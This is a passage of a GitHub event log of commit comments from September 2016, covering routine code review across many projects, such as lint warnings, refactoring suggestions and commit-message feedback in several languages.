~^~~\n```\n[R/generateArtificialData.R:9:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L9) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tn_traits <- numTraits;\n                    ^~~~~~~~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix(round(rnorm(n = (pool_richness * n_traits), mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tn_communities <- numCommunities\n                     ~^~~\n```\n[R/generateArtificialData.R:10:26:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L10) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tn_communities <- numCommunities\n                         ^~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:11:26:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n                        ~^~~\n```\n[R/generateArtificialData.R:11:39:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L11) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n                                      ^\n```\n[R/generateArtificialData.R:12:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumn1 <- c()\n^\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L13) *style:* **lines should not be more than 80 characters.**\n```r\n​\ttraits_pool <- matrix(round(rnorm(n = (pool_richness * n_traits), mean = 0, sd = 1), 3),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:13:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix(round(rnorm(n = (pool_richness * n_traits), mean = 0, sd = 1), 3),\n                   ~^~~\n```\n"}},"created_at":"2016-09-17T09:36:56Z"}
{"id":"4577676596","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19064166,"position":60,"line":56,"path":"app/core/Router.php","commit_id":"14b121387292a856cf125fea2f535825115f6773","created_at":"2016-09-17T09:37:28Z","updated_at":"2016-09-17T09:37:28Z","body":"@ostapqwert  при текущем подходе реализации, тебе не нужна эта функция"}},"created_at":"2016-09-17T09:37:28Z"}
{"id":"4577677129","type":"CommitCommentEvent","actor":{"login":"NathanW2"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19064167,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T09:37:53Z","updated_at":"2016-09-17T09:37:53Z","body":"How did you find it?\n\nOn Sat, 17 Sep 2016 6:52 pm Nyall Dawson <notifications@github.com> wrote:\n\n> Yep. There was an endless cycle between this and qgsdoublespinbox. All\n> fixed:)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/qgis/QGIS/commit/59583e97deef732f6884a54b518fc34225fd6012#commitcomment-19064032>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAXS3HRVaIow_r6JNXFwAjhKpKiOLXv9ks5qq6pDgaJpZM4J_iyF>\n> .\n>\n"}},"created_at":"2016-09-17T09:37:53Z"}
{"id":"4577677896","type":"CommitCommentEvent","actor":{"login":"mkclcr"},"repo":{"name":"mahendra2015/git-code-review"},"payload":{"comment":{"id":19064168,"position":7,"line":21,"path":"app/index.html","commit_id":"b6f4241fdedef8b6c7d3e804af85f44a4dda2504","created_at":"2016-09-17T09:38:33Z","updated_at":"2016-09-17T09:38:33Z","body":"needful done"}},"created_at":"2016-09-17T09:38:33Z"}
{"id":"4577677914","type":"CommitCommentEvent","actor":{"login":"cokochiaki"},"repo":{"name":"yvekochan/supreme-robot"},"payload":{"comment":{"id":19064169,"position":null,"line":null,"path":null,"commit_id":"ccd1e6cf8e979d68e5ef580a47808419d1ca6d5f","created_at":"2016-09-17T09:38:33Z","updated_at":"2016-09-17T09:38:33Z","body":"\r\n`https://github.com/yvekochan/supreme-robot.git`"}},"created_at":"2016-09-17T09:38:33Z"}
{"id":"4577679718","type":"CommitCommentEvent","actor":{"login":"aleksashka"},"repo":{"name":"cobbler/cobbler"},"payload":{"comment":{"id":19064172,"position":null,"line":null,"path":null,"commit_id":"5fe102f393b80796c63df51a89383df39de852a5","created_at":"2016-09-17T09:40:01Z","updated_at":"2016-09-17T09:40:01Z","body":"#1693"}},"created_at":"2016-09-17T09:40:01Z"}
{"id":"4577683667","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19064174,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T09:43:21Z","updated_at":"2016-09-17T09:43:21Z","body":"# Line break before question\r\nI think it is good practice to separate introduction and actual question by a line break. So If I feel like I know what '^' stands for, I can immediately find the beginning of the question"}},"created_at":"2016-09-17T09:43:21Z"}
{"id":"4577684038","type":"CommitCommentEvent","actor":{"login":"mattock"},"repo":{"name":"chipitsine/openvpn-build"},"payload":{"comment":{"id":19064175,"position":40,"line":54,"path":"windows-nsis/build-complete","commit_id":"d2fc1604f4e60c2e2811309c7b0d270c4f4aff35","created_at":"2016-09-17T09:43:39Z","updated_at":"2016-09-17T09:43:39Z","body":"It seems that most of this is just whitespace change, e.g. conversion of tabs to spaces or vice versa. This makes reviewing the actual changes way more difficult. Could you please fix that?"}},"created_at":"2016-09-17T09:43:39Z"}
{"id":"4577687778","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19064176,"position":null,"line":null,"path":null,"commit_id":"4848c9766deaf67351cc21bc188b82af733c7f03","created_at":"2016-09-17T09:46:57Z","updated_at":"2016-09-17T09:46:57Z","body":"Thanks, seems to be working nicely! :+1: "}},"created_at":"2016-09-17T09:46:57Z"}
{"id":"4577688500","type":"CommitCommentEvent","actor":{"login":"cgogolin"},"repo":{"name":"PanPalitta/phase_estimation"},"payload":{"comment":{"id":19064177,"position":241,"line":241,"path":"src/phase_loss_rand.cpp","commit_id":"297d4afdcfea38048ac7e741cff894764efff41b","created_at":"2016-09-17T09:47:34Z","updated_at":"2016-09-17T09:47:34Z","body":"Yes, exactly. Sorry for being unclear."}},"created_at":"2016-09-17T09:47:34Z"}
{"id":"4577689258","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064179,"position":1,"line":27,"path":"app/controllers/admin/stats_controller.rb","commit_id":"8c038e84a4163a77c64ede3ec1ce2dd6402a7598","created_at":"2016-09-17T09:48:13Z","updated_at":"2016-09-17T09:48:13Z","body":"This query is way too long and too complex to be in a controller. You could shove it down to the model, adding either a scope or a class method to the `UserVisit` model, split it into multiple lines and maybe even multiple methods, for instance:\r\n```ruby\r\ndef self.visit_data_for_time_unit(time_unit) #or whatever describes the query\r\n  visitors_for_time_unit.count.map { |k, v|\r\n    { label: k.to_s().slice(0,10), value: v }\r\n  }.sort_by { |d| d[:label] }\r\nend\r\n\r\nprivate\r\n\r\ndef self.visitors_for_time_unit(time_unit)\r\n  where(\"visited_at > ?\", time_unit[:visit_limit]).\r\n    group(\"DATE_TRUNC('#{time_unit[:unit]}', visited_at)\")\r\nend\r\n  "}},"created_at":"2016-09-17T09:48:13Z"}
{"id":"4577689285","type":"CommitCommentEvent","actor":{"login":"dgyuri92"},"repo":{"name":"dgyuri92/oauth_app"},"payload":{"comment":{"id":19064180,"position":null,"line":null,"path":null,"commit_id":"720a8a413191f4ec3497ad43f38ac7477c57f02b","created_at":"2016-09-17T09:48:15Z","updated_at":"2016-09-17T09:48:15Z","body":"Hello, from API"}},"created_at":"2016-09-17T09:48:15Z"}
{"id":"4577690281","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19064184,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T09:49:10Z","updated_at":"2016-09-17T09:49:10Z","body":"# Swirl in general\r\n##T and TRUE not evaluated identically within swirl?\r\nFor the grep question where I was supposed to set `value = TRUE`, `value = T` did not work. That should not be the case.\r\n\r\n## question ids\r\nwhy do questions not have ids? Or are they optional?\r\n"}},"created_at":"2016-09-17T09:49:10Z"}
{"id":"4577690511","type":"CommitCommentEvent","actor":{"login":"zero334"},"repo":{"name":"zero334/G19SystemMonitor"},"payload":{"comment":{"id":19064185,"position":null,"line":null,"path":null,"commit_id":"361d8bf92c0f1e2bcb2621b4a65080c31ac0be50","created_at":"2016-09-17T09:49:23Z","updated_at":"2016-09-17T09:49:23Z","body":"Hi Hummel95, at the moment I am very satisfied with the state of the project. Currently I do not have any plans to add more features to the app, unless someone asks for it. Until then I will optimize the performance and make the code more modular."}},"created_at":"2016-09-17T09:49:23Z"}
{"id":"4577693698","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064189,"position":null,"line":null,"path":null,"commit_id":"d2d7902779aa3b522b0afb5642cc428845dee22e","created_at":"2016-09-17T09:52:08Z","updated_at":"2016-09-17T09:52:08Z","body":"```\r\nfollowing packages are added\r\n```\r\n워낙 간단한 커밋이지만, 아래에 패키지 이름을 커밋 메세지에서도 보여줘야 하지 않을까요??"}},"created_at":"2016-09-17T09:52:08Z"}
{"id":"4577695490","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064192,"position":7,"line":32,"path":"app/controllers/admin/stats_controller.rb","commit_id":"8c038e84a4163a77c64ede3ec1ce2dd6402a7598","created_at":"2016-09-17T09:53:35Z","updated_at":"2016-09-17T09:53:35Z","body":"You could utilize a serializer for this (but might be also be overengineering here)."}},"created_at":"2016-09-17T09:53:35Z"}
{"id":"4577695870","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19064193,"position":null,"line":null,"path":null,"commit_id":"597b42fb4eaa200b0655ebaf1c353b247ed74efe","created_at":"2016-09-17T09:53:58Z","updated_at":"2016-09-17T09:53:58Z","body":":+1: \r\n"}},"created_at":"2016-09-17T09:53:58Z"}
{"id":"4577696723","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064195,"position":null,"line":null,"path":null,"commit_id":"e8c7a8670c9939ffeee66af4033dc5545a900d7b","created_at":"2016-09-17T09:54:39Z","updated_at":"2016-09-17T09:54:39Z","body":"`unexpected packages` 보다는 이전 커밋의 일종의 실수를 바로잡는 특수한 성격의 커밋이니 `Revert installed packages` 혹은 `Uninstalled packages`라고 제목을 지은 후, d2d7902 에서 설치한 패키지들을 지웠다고 커밋 메세지에 명시해주는게 더 깔끔할 것 같습니다"}},"created_at":"2016-09-17T09:54:39Z"}
{"id":"4577698354","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064199,"position":null,"line":null,"path":null,"commit_id":"e8c7a8670c9939ffeee66af4033dc5545a900d7b","created_at":"2016-09-17T09:56:07Z","updated_at":"2016-09-17T09:56:07Z","body":"`unexpected` 자체에서는 **\"오호...의도치 않았던 패키지라는군. 근데 그걸 갖고 뭐했대??\"** 같은 느낌이 저는 들었습니다. 다른 분들은 어땠을지는 모르겠네요!"}},"created_at":"2016-09-17T09:56:07Z"}
{"id":"4577699783","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"fabiocaccamo/FCUUID"},"payload":{"comment":{"id":19064200,"position":null,"line":null,"path":null,"commit_id":"dab6d29c672d5b634fa706c823c5ea26abb27636","created_at":"2016-09-17T09:57:23Z","updated_at":"2016-09-17T09:57:23Z","body":"Thanks! Finally I can delete my fork https://github.com/3lvis/PersistentUUID 👏 "}},"created_at":"2016-09-17T09:57:23Z"}
{"id":"4577700564","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19064201,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T09:58:05Z","updated_at":"2016-09-17T09:58:05Z","body":"# How shift attention to created output?\r\nI was wondering how that could be done. Otherwise, I think you are tempted to answer the question and don't pay attention to the output, which, in some cases, is quite verbose, e.g. the `gregexpr` example, we get a long list in which in turn every element contain three elements. Especially when the text of the next question is long and the console takes only a small proportion of the window (i.e. because you have .R files open in the editor), you hardly see the output. But I think you should know what you produce... So one way to go about it would be to refer to the output before continuing with the next question, e.g. display a text where you are only asked to read and then press enter. Of course that would not be necessary for all questions. \r\nIn addition, we could recommend at the beginning of the course to give reduce the size of the editor to a minimum. Actually you don't even need it. Just did that and it makes quite a difference when working through the class."}},"created_at":"2016-09-17T09:58:05Z"}
{"id":"4577701139","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19064202,"position":14,"line":22,"path":"templates/_footer.phtml","commit_id":"48da8fa29535e1311e1ea1196912b784f4bd0843","created_at":"2016-09-17T09:58:39Z","updated_at":"2016-09-17T09:58:39Z","body":"I guess the repository link next to the licensing info could be removed then, to avoid duplication."}},"created_at":"2016-09-17T09:58:39Z"}
{"id":"4577702600","type":"CommitCommentEvent","actor":{"login":"nicolasmarc"},"repo":{"name":"bcourter/SpaceClaim-Addins-Experimental"},"payload":{"comment":{"id":19064203,"position":null,"line":null,"path":null,"commit_id":"cfed98af9e2028bbd28749bc2843374f681eb644","created_at":"2016-09-17T09:59:56Z","updated_at":"2016-09-17T09:59:56Z","body":"Hi Blake, how are you?\r\nAET tools seems very interesting for additive manufcturing, i think forstnerize could be useful for create lattice but work only Z direction ?\r\n"}},"created_at":"2016-09-17T09:59:56Z"}
{"id":"4578891148","type":"CommitCommentEvent","actor":{"login":"deep110"},"repo":{"name":"deep110/Androble"},"payload":{"comment":{"id":19068039,"position":null,"line":null,"path":null,"commit_id":"a0fa93d0de655b7a2be483b5c222bd911f97a40c","created_at":"2016-09-18T00:00:12Z","updated_at":"2016-09-18T00:00:12Z","body":"Also updated the buildToolsVersion from 24.0.0 to 24.0.1."}},"created_at":"2016-09-18T00:00:12Z"}
{"id":"4578891437","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19068044,"position":15,"line":33,"path":"src/pocketmine/block/ActiveRedstoneLamp.php","commit_id":"fdf7e57405e864fe4896cf76b8c51946ed626400","created_at":"2016-09-18T00:00:18Z","updated_at":"2016-09-18T00:00:18Z","body":"Why not `count(self::$updateQueue) == 0`?"}},"created_at":"2016-09-18T00:00:18Z"}
{"id":"4578892149","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":19068046,"position":null,"line":null,"path":null,"commit_id":"365f6e778a93dad4e937466291f23bb34e631198","created_at":"2016-09-18T00:00:43Z","updated_at":"2016-09-18T00:00:43Z","body":"pull qs down with one finger. Yes, this feature doesn't work too."}},"created_at":"2016-09-18T00:00:43Z"}
{"id":"4578892937","type":"CommitCommentEvent","actor":{"login":"jcansdale"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19068052,"position":181,"line":32,"path":"src/BenchmarkDotNet.Core/Jobs/JobExtensions.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-18T00:01:22Z","updated_at":"2016-09-18T00:01:22Z","body":"E.g.\r\n\r\n```c#\r\n        public FastAndDirtyConfig()\r\n        {\r\n            Add(Job.Default\r\n                .WithLaunchCount(1)     // benchmark process will be launched only once\r\n                .WithIterationTime(new TimeInterval(100, TimeUnit.Millisecond)) // 100ms per iteration\r\n                .WithWarmupCount(3)     // 3 warmup iteration\r\n                .WithTargetCount(3)     // 3 target iteration\r\n            );\r\n        }\r\n```"}},"created_at":"2016-09-18T00:01:22Z"}
{"id":"4578893238","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19068053,"position":null,"line":null,"path":null,"commit_id":"75131798fc4fdd01a5df02f5664b78b1af2466ad","created_at":"2016-09-18T00:01:36Z","updated_at":"2016-09-18T00:01:36Z","body":"You forgot to add OpenMegaEngine.project.gmx to your commits. It seems to be the only thing missing to make it work."}},"created_at":"2016-09-18T00:01:36Z"}
{"id":"4578895671","type":"CommitCommentEvent","actor":{"login":"vitalyp"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19068055,"position":null,"line":null,"path":null,"commit_id":"5d4cb465d0da1249c3e5cd87265060e3f1f838ca","created_at":"2016-09-18T00:02:51Z","updated_at":"2016-09-18T00:02:51Z","body":"Неплохо написал. Всегда есть куда стремиться, но этот коммит хорош.\nЯ запущу, посмотрю в действии"}},"created_at":"2016-09-18T00:02:51Z"}
{"id":"4578896143","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19068056,"position":9,"line":9,"path":"experiments/amulet/design/ReadMe.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-18T00:03:18Z","updated_at":"2016-09-18T00:03:18Z","body":"Ahh, my brain read it as \"I don't think I can handle this\". I'm going to bed: it is 1 o'clock."}},"created_at":"2016-09-18T00:03:18Z"}
{"id":"4578898376","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19068059,"position":9,"line":0,"path":"experiments/amulet/design/ReadMe.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-18T00:05:22Z","updated_at":"2016-09-18T00:05:22Z","body":"Good night.\n"}},"created_at":"2016-09-18T00:05:22Z"}
{"id":"4578898378","type":"CommitCommentEvent","actor":{"login":"guts94"},"repo":{"name":"MOVZX/Kenzo"},"payload":{"comment":{"id":19068060,"position":null,"line":null,"path":null,"commit_id":"fbfe5c5159a472f1562ead9ba542066a7d307700","created_at":"2016-09-18T00:05:23Z","updated_at":"2016-09-18T00:05:23Z","body":"Ok leave it, Sorry for the above I just saw your https://github.com/MOVZX/Kenzo/commit/ab1725b1af1c62480d60e556e315eb7ec6a252f7 thanks for the credits"}},"created_at":"2016-09-18T00:05:23Z"}
{"id":"4578899800","type":"CommitCommentEvent","actor":{"login":"VoOoLoX"},"repo":{"name":"VoOoLoX/ramme"},"payload":{"comment":{"id":19068067,"position":null,"line":null,"path":null,"commit_id":"25e21e22137258476c4eb077b80f454b8f208ffb","created_at":"2016-09-18T00:06:42Z","updated_at":"2016-09-18T00:06:42Z","body":"@terkelg\r\n\r\nHere is the GIF of how it looks like : http://i.imgur.com/9xFLPQD.gif"}},"created_at":"2016-09-18T00:06:42Z"}
{"id":"4578901619","type":"CommitCommentEvent","actor":{"login":"nine7nine"},"repo":{"name":"nine7nine/wine-lpa"},"payload":{"comment":{"id":19068073,"position":null,"line":null,"path":null,"commit_id":"780af1b8cc386599221dc1e682b633d52f2838a6","created_at":"2016-09-18T00:08:19Z","updated_at":"2016-09-18T00:08:19Z","body":"also remove wine-staging-git, since it is just a earlier build of the wine-lpa-1.9.18r75..."}},"created_at":"2016-09-18T00:08:19Z"}
{"id":"4578902934","type":"CommitCommentEvent","actor":{"login":"bhammack"},"repo":{"name":"bhammack/rasp-irc"},"payload":{"comment":{"id":19068078,"position":null,"line":null,"path":null,"commit_id":"c8c9a5f233ec1fb0562a1bfcf63847070b0f1eff","created_at":"2016-09-18T00:09:28Z","updated_at":"2016-09-18T00:09:28Z","body":"Woops. Way to commit to master ya goon."}},"created_at":"2016-09-18T00:09:28Z"}
{"id":"4578903315","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19068079,"position":null,"line":null,"path":null,"commit_id":"f8dac7de8bdfedb1207ed93e442f35fe83e39511","created_at":"2016-09-18T00:09:53Z","updated_at":"2016-09-18T00:09:53Z","body":"@davidromani how can I remove this last commit on devel? \r\n`$git revert HEAD`  ?   I didn't write down when we did it.\r\nI should've done commit on excelwebzone/recaptcha-bundle :rage:"}},"created_at":"2016-09-18T00:09:53Z"}
{"id":"4578903442","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19068082,"position":41,"line":1531,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"41697da926f5c57fda16bc00055cc1a07d50064a","created_at":"2016-09-18T00:10:00Z","updated_at":"2016-09-18T00:10:00Z","body":"> What do you mean same type as File?\r\n\r\nI'm comparing with `Optional`, which I'm going to use instead of this."}},"created_at":"2016-09-18T00:10:00Z"}
{"id":"4578903933","type":"CommitCommentEvent","actor":{"login":"tyler-sassaman"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19068085,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T00:10:26Z","updated_at":"2016-09-18T00:10:26Z","body":"I was thinking about tracking sunk ships. Just a thought, but what if we had a global variable for each ship (carrier = 5), and every time we hit that type of ship we decrement that value, and compare it to 0. so if carrier gets to 0 then it has been hit 5 times which is the same thing as being sunk."}},"created_at":"2016-09-18T00:10:26Z"}
{"id":"4578904418","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":19068088,"position":null,"line":null,"path":null,"commit_id":"365f6e778a93dad4e937466291f23bb34e631198","created_at":"2016-09-18T00:10:57Z","updated_at":"2016-09-18T00:10:57Z","body":"I want to test move this code \r\n+        if (Settings.System.getInt(mContext.getContentResolver(),\r\n +                    Settings.System.DOUBLE_TAP_SLEEP_NAVBAR, 0) == 1)\r\n +            mDoubleTapGesture.onTouchEvent(event);\r\n\r\nabove this         if (mGestureHelper.onTouchEvent(event)) {\r\n             return true;"}},"created_at":"2016-09-18T00:10:57Z"}
{"id":"4578905714","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"hnakamur/go-sshd"},"payload":{"comment":{"id":19068092,"position":40,"line":87,"path":"server.go","commit_id":"fd0ed5dd58e3379905116cd551b21b98124cafb7","created_at":"2016-09-18T00:12:09Z","updated_at":"2016-09-18T00:12:09Z","body":"@corny I don't know a boolean is always atomic. Could you give me the URL for that information?\r\nEven if a boolean is always atomic, my understanding is that you still need a synchronization like sync.Lock to read a value updated by another goroutine.\r\n\r\n* [What operations are atomic? What about mutexes?](https://golang.org/doc/faq#What_operations_are_atomic_What_about_mutexes)\r\n* [The Go Memory Model - The Go Programming Language](https://golang.org/ref/mem)"}},"created_at":"2016-09-18T00:12:09Z"}
{"id":"4578908916","type":"CommitCommentEvent","actor":{"login":"Dogmans897"},"repo":{"name":"ICS460Team6/ICS460Projects"},"payload":{"comment":{"id":19068097,"position":null,"line":null,"path":null,"commit_id":"94bcc07a97bcee3a24cbdf75ea293dddae60e697","created_at":"2016-09-18T00:15:13Z","updated_at":"2016-09-18T00:15:13Z","body":"After talking with a few people who've taken and passed the course they said to use the echo server that he provided the code for in class as a base to build on for the project. I typed in all the code necessary for the UDP example to work in Eclipse. Here are the four classes. "}},"created_at":"2016-09-18T00:15:13Z"}
{"id":"4578909941","type":"CommitCommentEvent","actor":{"login":"Dogmans897"},"repo":{"name":"ICS460Team6/ICS460Projects"},"payload":{"comment":{"id":19068103,"position":28,"line":28,"path":"SenderThread.java","commit_id":"94bcc07a97bcee3a24cbdf75ea293dddae60e697","created_at":"2016-09-18T00:16:05Z","updated_at":"2016-09-18T00:16:05Z","body":"We will need to change the input method from System.in to a file reader. "}},"created_at":"2016-09-18T00:16:05Z"}
{"id":"4578911378","type":"CommitCommentEvent","actor":{"login":"Dogmans897"},"repo":{"name":"ICS460Team6/ICS460Projects"},"payload":{"comment":{"id":19068104,"position":25,"line":25,"path":"ReceiverThread.java","commit_id":"94bcc07a97bcee3a24cbdf75ea293dddae60e697","created_at":"2016-09-18T00:17:17Z","updated_at":"2016-09-18T00:17:17Z","body":"Just like in the SenderThread class we will need to change the output from a println to a file. These changed wont really be tough."}},"created_at":"2016-09-18T00:17:17Z"}
{"id":"4578913236","type":"CommitCommentEvent","actor":{"login":"gorbiz"},"repo":{"name":"gorbiz/touchart"},"payload":{"comment":{"id":19068108,"position":null,"line":null,"path":null,"commit_id":"0e186f1c40a20aeac0de1b98e259096ab6edb725","created_at":"2016-09-18T00:19:00Z","updated_at":"2016-09-18T00:19:00Z","body":"![screenshot from 2016-09-18 00-58-24](https://cloud.githubusercontent.com/assets/207850/18611796/40391886-7d46-11e6-8018-f882665dc172.png)\r\n![screenshot from 2016-09-18 01-28-13](https://cloud.githubusercontent.com/assets/207850/18611795/4038ff86-7d46-11e6-9031-13ed9cc50b78.png)\r\n"}},"created_at":"2016-09-18T00:19:00Z"}
{"id":"4578914434","type":"CommitCommentEvent","actor":{"login":"Chris2fourlaw"},"repo":{"name":"Chris2fourlaw/ChickenPotPi"},"payload":{"comment":{"id":19068111,"position":445,"line":113,"path":"chickendoor_control.py","commit_id":"3e9c6507e90e282f7249c8dab6117808a4fa62ca","created_at":"2016-09-18T00:20:14Z","updated_at":"2016-09-18T00:20:14Z","body":"no if door moving?"}},"created_at":"2016-09-18T00:20:14Z"}
{"id":"4578915131","type":"CommitCommentEvent","actor":{"login":"Chris2fourlaw"},"repo":{"name":"Chris2fourlaw/ChickenPotPi"},"payload":{"comment":{"id":19068112,"position":462,"line":130,"path":"chickendoor_control.py","commit_id":"3e9c6507e90e282f7249c8dab6117808a4fa62ca","created_at":"2016-09-18T00:20:55Z","updated_at":"2016-09-18T00:20:55Z","body":"global button stop"}},"created_at":"2016-09-18T00:20:55Z"}
{"id":"4578916633","type":"CommitCommentEvent","actor":{"login":"Chris2fourlaw"},"repo":{"name":"Chris2fourlaw/ChickenPotPi"},"payload":{"comment":{"id":19068117,"position":502,"line":170,"path":"chickendoor_control.py","commit_id":"3e9c6507e90e282f7249c8dab6117808a4fa62ca","created_at":"2016-09-18T00:22:24Z","updated_at":"2016-09-18T00:22:24Z","body":"stop door?"}},"created_at":"2016-09-18T00:22:24Z"}
{"id":"4578917480","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19068121,"position":17,"line":17,"path":"00-HTML-CSS-basics/Ejercicio 2.1/index.html","commit_id":"897b192e43b0ecf41edc9ef67bdd4ebfdffc364c","created_at":"2016-09-18T00:23:08Z","updated_at":"2016-09-18T00:23:08Z","body":"Si son distintos porque nosotros usamos una versión modificada de bem.\nÚsalo como está en el standard que les pasé. Vas a ver que la diferencia\nestá en que antes de los elementos usamos -- y antes de los modificadores _\nEs exactamente al reves del BEM tradicional.\n\nSaludos\n\nEl 17 sept. 2016 20:33, \"Emmanuel-Benvenutto\" <notifications@github.com>\nescribió:\n\n> Fer, intenté utilizar BEM...pero tomé ejemplos de este link y son distintos\n> a como vos me plantéas...\n>\n> http://getbem.com/naming/\n>\n> Por ejemplo, el que está al final de la página:\n>\n> .form__submit--disabled { }\n>\n> Ahí utiliza \"__\" para agregar un elemento al bloque.\n>\n> Tendría que usar \"--\" para el elemento entonces?\n>\n>\n>\n> 2016-09-17 18:18 GMT-03:00 fercho8787 <notifications@github.com>:\n>\n> > Remember that according to our standard, BEM should be written like:\n> > *Block--Element_Modifier*\n> >\n> > I like to see that you implemented BEM.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/Emmanuel-Benvenutto/startup/commit/\n> 897b192e43b0ecf41edc9ef67bdd4ebfdffc364c#commitcomment-19067243>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AVHMRk_XtpQ_rEaopJ-\n> Soai0396x5v6vks5qrFkwgaJpZM4J_t2F>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it 